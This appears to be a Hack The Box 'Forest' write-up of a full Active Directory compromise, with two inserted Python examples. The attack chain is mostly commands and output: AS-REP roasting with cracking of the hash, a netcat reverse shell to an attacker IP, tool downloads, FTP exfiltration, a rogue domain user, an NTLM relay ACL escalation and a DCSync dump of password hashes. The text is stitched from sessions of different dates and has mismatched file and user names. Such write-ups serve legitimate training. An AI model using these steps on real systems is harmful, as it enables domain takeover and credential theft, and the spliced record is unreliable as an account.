As usual, first an nmap scan
root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds
There are already several interesting things in this result. First of all, this is a domain-joined system in the htb.local domain. It exposes Kerberos (88), LDAP (389/3268) and SMB (445) to the outside world and, with DNS on 53 as well, looks like a domain controller. And last but not least, WinRM (5985) is open. This could be an attack similar to the approach I took a long time ago for the 'Active' machine on Hack The Box, combined with the WinRM approach on Heist!
First let’s try enum4linux to see if I can list some more information.
root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9
==========================
| Target Information |
==========================
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
===========================================
| Getting domain SID for 10.10.10.161 |
===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
=============================
| Users on 10.10.10.161 |
=============================
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
====================================================
| Password Policy Information for 10.10.10.161 |
====================================================
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] HTB
[+] Builtin
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
==============================
| Groups on 10.10.10.161 |
==============================
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019
Enum4linux offers many interesting things. First of all I see that there are some users (sebastien, lucinda, andy, mark, santi) present and a clear service account (svc-alfresco), which is a member of 'Service Accounts' and, through that group, of 'Privileged IT Accounts'.
Furthermore, no password complexity is enforced (Password Complexity: Disabled, minimum length 7) and the lockout threshold is None, so passwords may be easy to guess or crack and guessing does not lock anything out. The group list (Organization Management, Exchange Trusted Subsystem, Exchange Windows Permissions, and the EXCH01$ computer account) shows a Microsoft Exchange installation, and Exchange setup is known to grant its groups far-reaching rights on the domain object unless that is cleaned up afterwards. And a last line confirms the suspicion: FOREST$ is a member of Domain Controllers, so Forest really is a domain controller. So I started browsing the impacket tools and trying several until I got to GetNPUsers.py, which asks the KDC for an AS-REP on behalf of accounts that have 'Do not require Kerberos preauthentication' set; without pre-authentication anyone can request that reply, and its encrypted part can be cracked offline.
┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e
After trying it for some users, I finally got a hit for svc-alfresco: the account has UF_DONT_REQUIRE_PREAUTH set, so the KDC handed out an AS-REP without any proof of the password, and impacket prints its encrypted part (etype 23, RC4-HMAC keyed with the account's NT hash) in John's $krb5asrep$23$ format. That is not a usable TGT yet, but it is something I could try cracking with John:
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed
┌─[puck@parrot-lt]─[~/htb/forrest]
So apparently svc-alfresco's password is s3rvice. WinRM is open and the account turns out to be allowed to use it, so all that remains for the user flag is to log in with evil-winrm and start escalating privileges from there:
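To make clear why this AS-REP can be attacked offline at all, here is an added example (my own code, not the write-up's and not part of impacket or John): it implements the etype 23 RC4-HMAC construction from RFC 4757 with key usage 8 (the usage impacket and hashcat mode 18200 use for the AS-REP enc-part of a no-pre-auth account), forges a $krb5asrep$23$ line for a known password so the check can run without a KDC, and then recovers that password from a small candidate list the way John does. MD4 and RC4 are written out in pure Python because current OpenSSL builds usually ship both disabled; the svc-test account, the plaintext and the candidate list are constructed test data.

```python
# Added example, not from the write-up: offline check of a $krb5asrep$23$ line.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
AS_REP_KEY_USAGE = 8   # RC4-HMAC key usage for the AS-REP enc-part without pre-auth


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), range(16)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        blk = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + blk[idx] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate the working variables
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                         # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                            # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes = None):
    """RFC 4757 encryption: returns (checksum, ciphertext) as the KDC sends them."""
    confounder = confounder if confounder is not None else os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", AS_REP_KEY_USAGE))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)               # K2 equals K1 for this usage
    return checksum, rc4(_hmac_md5(k1, checksum), data)   # K3 = HMAC(K1, checksum)


def forge_asrep_line(user, realm, password, plaintext, confounder=None):
    """Build a $krb5asrep$23$ line for a known password (constructed test data only)."""
    checksum, ct = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ct.hex()}"


def crack_asrep(line: str, candidates):
    """Return the candidate whose NT hash decrypts the enc-part with a valid checksum."""
    header, rest = line.split(":", 1)
    if not header.startswith("$krb5asrep$23$"):
        raise ValueError("only etype 23 lines are handled here")
    checksum, ct = (bytes.fromhex(part) for part in rest.split("$"))
    usage = struct.pack("<I", AS_REP_KEY_USAGE)
    for pw in candidates:
        k1 = _hmac_md5(nt_hash(pw), usage)
        data = rc4(_hmac_md5(k1, checksum), ct)
        if hmac.compare_digest(_hmac_md5(k1, data), checksum):
            return pw                            # checksum only verifies with the right key
    return None


if __name__ == "__main__":
    line = forge_asrep_line("svc-test", "HTB", "s3rvice", b"constructed AS-REP enc-part")
    print(line)
    print(crack_asrep(line, ["password", "Summer2019", "s3rvice"]))
```

Each candidate costs one MD4, three HMAC-MD5 and one RC4, and nothing ever touches the DC, which is why a single AS-REP for an account without pre-authentication turns a 7-character, complexity-free policy like the one enum4linux reported into a wordlist problem. crack_asrep takes the same line format impacket printed for svc-alfresco above.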
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Privilege Escalation
The next step is escalating privileges. After pressing CTRL-C one time too many (which also kills the evil-winrm session), I decided it was time to set up a simple fallback: a netcat reverse shell started from the WinRM session.
root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe
PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir
Directory: C:\Users\svc-alfresco\Documents\sedje
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/25/2019 5:20 AM 12950 20191025120253_BloodHound.zip
-a---- 10/25/2019 5:20 AM 9151 Rk9SRVNU.bin
-a---- 10/25/2019 5:18 AM 751616 SharpHound.exe
-a---- 10/25/2019 5:17 AM 886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe
Data: 1402196 bytes of 1402196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All
2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022
2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293
2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings. 117 name to SID mappings. 0 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings.
2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2022 3:35 AM 18873 20220906033525_BloodHound.zip
-a---- 9/6/2022 3:35 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2022 3:29 AM 1051648 SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
Info: Downloading 20220906033525_BloodHound.zip to ./20220906033525_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
After the SharpHound script and binary have been transferred, I run them as svc-alfresco and the collector writes a zip file with all relevant domain data (from an evil-winrm session the built-in download command fetches it directly, as shown above). All that remains is to transfer the file to my local machine and analyze it with BloodHound. The way I got used to during my OSCP journey is a small FTP script driven by ftp -s:, which works on any Windows host without extra tooling.
PS C:\Users\svc-alfresco\Documents\sedje> echo "open 10.10.15.64" > ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "anonymous" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "put 20191101052032_BloodHound.zip" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> echo "quit" >> ftp
PS C:\Users\svc-alfresco\Documents\sedje> ftp -s:ftp
open 10.10.15.64
Log in with USER and PASS first.
User (10.10.15.64:(none)):
put 20191025120253_BloodHound.zip
quit
Of course, this approach requires an active FTP server on my attacker, which can be easily done with Python
root@kalivm:~/Forest# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
RuntimeWarning)
[I 2019-10-25 13:15:13] >>> starting FTP server on 0.0.0.0:21, pid=5057 < <<
[I 2019-10-25 13:15:13] concurrency model: async
[I 2019-10-25 13:15:13] masquerade (NAT) address: None
[I 2019-10-25 13:15:13] passive ports: None
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[] FTP session opened (connect)
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] USER 'anonymous' logged in.
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] STOR /root/Documents/htb/Machines/Forest/20191025120253_BloodHound.zip completed=1 bytes=12950 seconds=0.07
[I 2019-10-25 13:15:27] 10.10.10.161:56840-[anonymous] FTP session closed (disconnect).
Thus, the file has been successfully transferred and can be loaded directly into BloodHound by simply dragging and dropping.
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/PowerView.ps1 -outfile Powerview.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\PowerView.ps1
PS C:\Users\svc-alfresco\Documents\sedje> $SecPassword = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
PS C:\Users\svc-alfresco\Documents\sedje> $Cred = New-Object System.Management.Automation.PSCredential('HTB\svc-alfresco', $SecPassword)
PS C:\Users\svc-alfresco\Documents\sedje> New-DomainUser -SamAccountName sedje -AccountPassword $SecPassword -Credential $Cred | Add-DomainGroupMember 'Exchange Windows Permissions' -Credential $Cred
Adding the svc-alfresco account itself to 'Exchange Windows Permissions' works, but a cleanup job removes the membership again after a few minutes, which is quite a pain. So I decided to create my own domain user, with the same password as svc-alfresco, and add that one to 'Exchange Windows Permissions'. That group is what matters: Exchange setup leaves it with WriteDACL on the domain object, so any member can grant itself the replication rights DCSync needs. After that, however, I lingered for a long time on the very specific syntax and switches required (and available) in the impacket tools. If some Discord users had not helped me, I would probably have given up in the end, so I have to thank them for pushing me to the next step!
root@kalivm:~/Forest# ntlmrelayx.py --escalate-user sedje -t ldap://10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
Now all I have to do is make an authenticated request to the HTTP server ntlmrelayx started on localhost: the browser performs NTLM authentication against it, ntlmrelayx relays that authentication to LDAP on the DC and, because of --escalate-user, changes the domain ACL for me. So I open a browser on http://127.0.0.1 and provide the sedje credentials.
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldap://10.10.10.161 as \sedje SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User sedje now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191025-135738.restoresedsedss
And ntlmrelayx.py already tells me what to do: sedje now has the replication rights needed for DCSync, so secretsdump.py can pull every secret from NTDS.DIT over DRSUAPI without ever touching the disk of the DC. The saved restore state is an aclpwn file that can undo the ACL change afterwards.
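What ntlmrelayx just did is a change to the DACL of the domain object. As an added example (not from the write-up and not BloodHound's own code), the following audits such a DACL: given the ACEs on the domain head in the shape SharpHound writes them into the domain JSON (PrincipalSID, PrincipalType, RightName, IsInherited; that shape and the right names are assumed from BloodHound 4.x collections, and raw entries carrying an ObjectType GUID are mapped as well), it reports who can DCSync right now and who can give themselves that right because they control the DACL, which is the hop 'Exchange Windows Permissions' provided here. The sample ACE list is constructed around the RIDs seen on this box, not taken from a real collection.

```python
# Added example, not from the write-up: who can DCSync, and who can make themselves able to.
from collections import defaultdict

DOMAIN_SID = "S-1-5-21-3072663084-364016917-1341370565"   # htb.local, from enum4linux above

# Extended-right GUIDs as they appear in a raw DACL, for exports that carry
# ObjectType GUIDs instead of BloodHound's RightName strings.
GUID_TO_RIGHT = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "GetChanges",               # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "GetChangesAll",            # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c": "GetChangesInFilteredSet",  # not needed for secrets
}

# Both replication rights are needed to pull password hashes; GetChanges alone
# only replicates non-secret attributes.
DCSYNC_RIGHTS = {"GetChanges", "GetChangesAll"}
# Rights that cover every extended right, replication included.
IMPLIES_DCSYNC = {"GenericAll", "AllExtendedRights"}
# Control over the DACL or ownership: the holder can write itself the ACEs above.
DACL_CONTROL = {"WriteDacl", "WriteOwner", "Owns"}


def rights_by_principal(aces):
    """Collapse ACE dicts into {PrincipalSID: set of right names}."""
    rights = defaultdict(set)
    for ace in aces:
        name = ace.get("RightName")
        if name is None:                                   # raw-DACL style entry
            name = GUID_TO_RIGHT.get(str(ace.get("ObjectType", "")).lower())
        if name:
            rights[ace["PrincipalSID"]].add(name)
    return rights


def audit_dcsync(aces):
    """Return who can DCSync now and who can grant it to themselves."""
    can_dcsync, can_grant = [], []
    for sid, held in rights_by_principal(aces).items():
        if DCSYNC_RIGHTS <= held or held & IMPLIES_DCSYNC:
            can_dcsync.append(sid)
        elif held & DACL_CONTROL:
            can_grant.append(sid)
    return {"can_dcsync": sorted(can_dcsync), "can_grant_dcsync": sorted(can_grant)}


def ace(sid, right, ptype="Group", inherited=False):
    """Helper producing one BloodHound-shaped ACE (assumed field names)."""
    return {"PrincipalSID": sid, "PrincipalType": ptype,
            "RightName": right, "IsInherited": inherited}


# Constructed sample resembling htb.local after the escalation above.
SAMPLE_ACES = [
    ace("S-1-5-9", "GetChanges"),                          # Enterprise Domain Controllers
    ace("S-1-5-9", "GetChangesAll"),
    ace(f"{DOMAIN_SID}-512", "GenericAll"),                # Domain Admins
    ace(f"{DOMAIN_SID}-1121", "WriteDacl"),                # Exchange Windows Permissions (RID 0x461)
    ace(f"{DOMAIN_SID}-1145", "GetChanges", "User"),       # sebastien: one of the two, not enough
    ace(f"{DOMAIN_SID}-9601", "GetChanges", "User"),       # puck, after the DCSync grant
    ace(f"{DOMAIN_SID}-9601", "GetChangesAll", "User"),
    ace(f"{DOMAIN_SID}-9601", "GetChangesInFilteredSet", "User"),
    # Domain Controllers group, as raw DACL entries carrying the extended-right GUIDs
    {"PrincipalSID": f"{DOMAIN_SID}-516", "ObjectType": "1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"},
    {"PrincipalSID": f"{DOMAIN_SID}-516", "ObjectType": "1131F6AD-9C07-11D1-F79F-00C04FC2DCD2"},
]

if __name__ == "__main__":
    for finding, sids in audit_dcsync(SAMPLE_ACES).items():
        print(finding, sids)
```

Anything in can_dcsync that is not Domain Admins, Enterprise Admins or a domain controller group is a finding, and anything in can_grant_dcsync is one too: Exchange Windows Permissions shows up there only because of WriteDacl, and that single right is what turned a service account on this box into every hash in the domain.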
root@kalivm:~/Forest# secretsdump.py htb/sedje:s3rvice@10.10.10.161
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
---snip---
The RemoteOperations failure is expected: sedje is no local administrator on the DC, so the SAM/registry route is denied. It does not matter, because the DRSUAPI method is DCSync itself: it only needs the replication rights just granted and returns every hash in the domain, including the Administrator NT hash, which is all psexec.py needs for pass-the-hash.
